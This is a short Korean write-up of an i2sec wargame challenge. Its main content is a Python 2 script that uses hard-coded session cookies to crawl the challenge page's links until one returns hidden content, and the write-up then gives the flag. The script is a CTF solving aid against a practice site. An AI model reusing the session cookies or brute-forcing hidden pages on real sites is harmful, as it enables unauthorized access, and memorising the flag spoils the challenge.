i2sec wargame challenge 9 write up
최근에 내가 있던 카카오톡 해킹 오픈채팅방에서 i2sec 학원에서 운영하는 한 워게임을 보게 되었다. 재밌어서 풀어봤다.
Challenge Analyse
시나리오
Exploit
#!/usr/bin/python
# coding: utf-8
import requests
from bs4 import BeautifulSoup
import sys
headers = {
'Cookie': 'cuk_ubp=CUK_D89AA5750_1501276929; PHPSESSID=ncm9a0li872fq3a4hsvg10c3d6'
}
url = 'http://mkgk222.cafe24.com/web/wargame/challenge9/'
content = requests.get(url, headers=headers).text
soup = BeautifulSoup(content, 'lxml')
links = [ ]
for link in soup.find_all('a'):
if str(link.get('href')).find("?") > -1 or str(link.get('href')).find("/") > -1:
pass
else :
links.append(str(link.get('href')))
for link in links:
url = "http://mkgk222.cafe24.com/web/wargame/challenge9/" + link
content = requests.get(url, headers=headers).content
print "[*] Accessing {0}".format(url)
if content.find("nonono") == -1:
print content
sys.exit(-1)
flag : i2sec{gothackcoding}